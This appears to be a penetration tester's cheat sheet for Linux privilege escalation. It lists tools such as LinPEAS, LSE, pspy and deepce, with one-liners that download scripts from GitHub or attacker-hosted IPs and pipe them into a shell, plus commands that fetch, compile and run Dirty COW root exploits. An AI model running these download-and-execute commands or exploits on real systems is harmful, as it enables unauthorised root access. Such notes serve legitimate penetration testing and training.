LPE

https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh


Linux

AutoSUID

GitHub - IvanGlinkin/AutoSUID: AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.

wget <https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh> && chmod +x AutoSUID.sh | sh

Linpeas

# Get the hostname
HOSTNAME=$(hostname)
# Get the current year
YEAR=$(date +"%Y")

OUTPUT_FILE="${HOSTNAME}_${YEAR}.txt"

curl -L <https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh> | sh > "$OUTPUT_FILE"
#wget "<https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh>" -O lse.sh;chmod 700 lse.sh && ./lse.sh -l2
bash <(wget -q -O - "<https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh>") -l2 -i > lse.txt
#curl "<https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh>" -Lo lse.sh;chmod 700 lse.sh && ./lse.sh -l2
#LIPEASE 3.1.4 NOT Safe for OSCP <https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/28fd74ffe5495aab6a3495c872399383578f37c1/linPEAS/linpeas.sh>
#LSE
wget <http://10.1.42.49:8088/lse.sh> && chmod +x lse.sh && ./lse.sh -l2
curl "<http://10.1.42.49:8088/lse.sh>" -Lo lse.sh;chmod 700 lse.sh && ./lse.sh -l1
#LinPEACE
curl "<http://10.1.42.49:8088/linpeas.sh>" -Lo linpeas.sh;chmod 700 linpeas.sh && ./linpeas.sh
wget <http://10.1.42.49:8088/lipeas.sh> && chmod +x lipeas.sh && ./lipeas.sh
curl -L <https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh> | sh

#PSPY
wget http:/10.8.0.20:8080/pspy64 && chmod +x pspy64 && ./pspy64 -pf -i 1000

#COW
wget <http://10.1.42.49:8088/cowroot.c> && gcc cowroot.c -o cowroot -pthread && ./cowroot
wget <http://10.1.42.49:8088/dirty.c> && gcc -pthread dirty.c -o dirty -lcrypt && ./dirty
wget http:/10.1.42.49:8088/dirtycow-mem.c && gcc -Wall -o dirtycow-mem dirtycow-mem.c -ldl -lpthread && ./dirtycow-mem

#Docker
wget <https://github.com/stealthcopter/deepce/raw/main/deepce.sh>
curl -sL <https://github.com/stealthcopter/deepce/raw/main/deepce.sh> -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("<https://github.com/stealthcopter/deepce/raw/main/deepce.sh>").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("<https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8>"))' > deepce.sh

Traitor

https://github.com/liamg/traitor

https://github.com/Gr1mmie/Windows-Privilege-Escalation-Resources https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation https://github.com/Gr1mmie/Linux-Privilege-Escalation-Resources https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/https://guif.re/linuxeop accesschk: https://xz.aliyun.com/t/73


Loki (Simple IOC and YARA Scanner)

LOKI Open-Source IOC Scanner - Nextron Systems

WINDOWS